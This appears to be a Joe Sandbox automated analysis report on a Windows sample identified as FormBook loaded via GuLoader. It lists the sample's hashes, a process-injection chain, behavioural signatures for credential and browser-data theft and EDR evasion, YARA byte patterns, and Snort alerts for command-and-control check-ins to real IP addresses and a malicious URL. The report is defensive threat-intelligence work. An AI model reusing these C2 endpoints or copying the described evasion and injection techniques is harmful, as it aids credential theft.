Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Nondesistance.exe

Overview

General Information

Sample name:Nondesistance.exe
Analysis ID:1447915
MD5:9695b61f42f2e5a77e2e8d29963fe980
SHA1:92396f929ffc0ec1c2929dcba7fa2b3de5859bc0
SHA256:1c6b868bda50a13de084c97460436742b1636b75e60708eeecb9c44d574ccce9
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • Nondesistance.exe (PID: 2812 cmdline: "C:\Users\user\Desktop\Nondesistance.exe" MD5: 9695B61F42F2E5A77E2E8D29963FE980)
    • Nondesistance.exe (PID: 772 cmdline: "C:\Users\user\Desktop\Nondesistance.exe" MD5: 9695B61F42F2E5A77E2E8D29963FE980)
      • jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe (PID: 7584 cmdline: "C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • write.exe (PID: 5860 cmdline: "C:\Windows\SysWOW64\write.exe" MD5: 3D6FDBA2878656FA9ECB81F6ECE45703)
          • firefox.exe (PID: 7336 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: D1CC73370B9EF7D74E6D9FD9248CD687)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a3f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13a3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a3f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13a3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 10 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:05/27/24-12:32:40.090613
        SID:2855464
        Source Port:49848
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:36:01.122880
        SID:2855464
        Source Port:49897
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:36:20.767832
        SID:2855465
        Source Port:49903
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:32:26.454904
        SID:2855464
        Source Port:49844
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:34:27.725976
        SID:2855464
        Source Port:49876
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:35:47.645599
        SID:2855464
        Source Port:49893
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:35:11.789697
        SID:2855464
        Source Port:49885
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:36:12.299229
        SID:2855464
        Source Port:49900
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:38:01.911180
        SID:2855465
        Source Port:49925
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:33:01.067777
        SID:2855465
        Source Port:49854
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:32:52.571681
        SID:2855464
        Source Port:49851
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:36:34.548211
        SID:2855465
        Source Port:49907
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:38:12.948901
        SID:2855465
        Source Port:49927
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:34:58.190056
        SID:2855464
        Source Port:49881
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:33:59.569233
        SID:2855464
        Source Port:49868
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:35:44.956448
        SID:2855464
        Source Port:49892
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:32:01.308526
        SID:2855464
        Source Port:49839
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:33:32.048609
        SID:2855464
        Source Port:49860
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:36:51.487436
        SID:2855464
        Source Port:49909
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:33:56.932565
        SID:2855464
        Source Port:49867
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:32:31.832166
        SID:2855465
        Source Port:49846
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:37:37.898952
        SID:2855464
        Source Port:49920
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:34:50.099581
        SID:2855465
        Source Port:49879
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:35:58.404426
        SID:2855464
        Source Port:49896
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:36:29.112955
        SID:2855464
        Source Port:49905
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:36:48.771430
        SID:2855464
        Source Port:49908
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:37:05.560664
        SID:2855464
        Source Port:49913
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:33:15.123573
        SID:2855465
        Source Port:49858
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:38:59.018936
        SID:2855465
        Source Port:49933
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:33:51.153017
        SID:2855465
        Source Port:49866
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:34:33.421188
        SID:2855465
        Source Port:49878
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:38:23.904167
        SID:2855465
        Source Port:49928
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:32:04.016634
        SID:2855464
        Source Port:49840
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:31:54.583592
        SID:2855465
        Source Port:49838
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:37:10.871109
        SID:2855465
        Source Port:49915
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:34:55.443005
        SID:2855464
        Source Port:49880
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:35:03.657162
        SID:2855465
        Source Port:49883
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:32:55.391432
        SID:2855464
        Source Port:49852
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:31:46.436699
        SID:2855464
        Source Port:49835
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:33:29.346239
        SID:2855464
        Source Port:49859
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:37:02.912526
        SID:2855464
        Source Port:49912
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:31:40.814068
        SID:2855465
        Source Port:49834
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:33:37.453709
        SID:2855465
        Source Port:49862
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:37:56.573241
        SID:2855465
        Source Port:49924
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:31:32.596218
        SID:2855464
        Source Port:49831
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:32:37.370163
        SID:2855464
        Source Port:49847
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:39:04.563126
        SID:2855465
        Source Port:49934
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:32:45.526108
        SID:2855465
        Source Port:49850
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:35:09.071712
        SID:2855464
        Source Port:49884
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:31:16.583331
        SID:2855465
        Source Port:49829
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:36:56.923016
        SID:2855465
        Source Port:49911
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:35:22.847505
        SID:2855464
        Source Port:49888
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:37:40.524446
        SID:2855464
        Source Port:49921
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:38:40.644901
        SID:2855465
        Source Port:49931
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:35:17.225872
        SID:2855465
        Source Port:49887
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:35:53.016457
        SID:2855465
        Source Port:49895
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:34:04.848986
        SID:2855465
        Source Port:49870
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:31:35.330244
        SID:2855464
        Source Port:49832
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:33:09.690678
        SID:2855464
        Source Port:49856
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:38:07.328663
        SID:2855465
        Source Port:49926
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:35:31.002949
        SID:2855465
        Source Port:49891
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:36:26.393095
        SID:2855464
        Source Port:49904
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:37:45.774029
        SID:2855465
        Source Port:49923
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:32:09.450151
        SID:2855465
        Source Port:49842
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:36:06.561854
        SID:2855465
        Source Port:49899
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:39:15.195832
        SID:2855465
        Source Port:49936
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:38:53.289335
        SID:2855465
        Source Port:49932
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:33:45.715686
        SID:2855464
        Source Port:49864
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:32:23.763503
        SID:2855464
        Source Port:49843
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:33:42.997051
        SID:2855464
        Source Port:49863
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:38:35.017545
        SID:2855465
        Source Port:49930
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:33:06.969628
        SID:2855464
        Source Port:49855
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:35:25.568823
        SID:2855464
        Source Port:49889
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:38:29.292431
        SID:2855465
        Source Port:49929
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:39:25.582552
        SID:2855465
        Source Port:49937
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:34:24.884091
        SID:2855464
        Source Port:49875
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:31:49.147726
        SID:2855464
        Source Port:49836
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/27/24-12:36:15.124753
        SID:2855464
        Source Port:49901
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: Nondesistance.exeAvira: detected
        Antivirus detection for URL or domain
        Source: http://www.donantedeovulos.space/udud/Avira URL Cloud: Label: malware
        Source: http://www.donantedeovulos.space/udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlGAvira URL Cloud: Label: malware
        Multi AV Scanner detection for submitted file
        Source: Nondesistance.exeReversingLabs: Detection: 50%
        Source: Nondesistance.exeVirustotal: Detection: 56%Perma Link
        Yara detected FormBook
        Source: Yara matchFile source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Nondesistance.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.251.16.101:443 -> 192.168.11.30:49827 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.253.62.132:443 -> 192.168.11.30:49828 version: TLS 1.2
        Source: Nondesistance.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: write.pdbGCTL source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021CB000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021D5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: write.pdb source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021CB000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021D5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033001346.0000000000C3E000.00000002.00000001.01000000.0000000B.sdmp
        Source: Binary string: wntdll.pdbUGP source: Nondesistance.exe, 00000009.00000003.20300365198.000000003216B000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20303958082.0000000032316000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004B7D000.00000040.00001000.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20394487085.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20391249832.00000000046FE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004A50000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Nondesistance.exe, Nondesistance.exe, 00000009.00000003.20300365198.000000003216B000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20303958082.0000000032316000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004B7D000.00000040.00001000.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20394487085.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20391249832.00000000046FE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004A50000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmp
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_00406033 FindFirstFileA,FindClose,4_2_00406033
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_004055D1
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 4_2_00402688 FindFirstFileA,4_2_00402688
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 4x nop then pop edi10_2_00603851
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 4x nop then mov esp, ebp10_2_00601267
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 4x nop then pop ebx10_2_0060322B
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 4x nop then xor eax, eax10_2_00606AD0
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 4x nop then mov esp, ebp10_2_006012BF
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 4x nop then pop edi10_2_00602550
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 4x nop then pop edi10_2_006025AE
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeCode function: 4x nop then pop edi10_2_00602580

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49829 -> 208.112.85.150:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49831 -> 79.98.25.1:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49832 -> 79.98.25.1:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49834 -> 79.98.25.1:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49835 -> 64.190.62.22:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49836 -> 64.190.62.22:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49838 -> 64.190.62.22:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49839 -> 3.73.27.108:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49840 -> 3.73.27.108:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49842 -> 3.73.27.108:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49843 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49844 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49846 -> 203.161.49.193:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49847 -> 91.195.240.123:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49848 -> 91.195.240.123:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49850 -> 91.195.240.123:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49851 -> 183.111.161.243:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49852 -> 183.111.161.243:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49854 -> 183.111.161.243:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49855 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49856 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49858 -> 3.64.163.50:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49859 -> 217.70.184.50:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49860 -> 217.70.184.50:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49862 -> 217.70.184.50:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49863 -> 91.195.240.123:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49864 -> 91.195.240.123:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49866 -> 91.195.240.123:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49867 -> 84.32.84.32:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49868 -> 84.32.84.32:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49870 -> 84.32.84.32:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49875 -> 147.92.36.247:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49876 -> 147.92.36.247:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49878 -> 147.92.36.247:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49879 -> 208.112.85.150:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49880 -> 79.98.25.1:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49881 -> 79.98.25.1:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49883 -> 79.98.25.1:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49884 -> 64.190.62.22:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49885 -> 64.190.62.22:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49887 -> 64.190.62.22:80
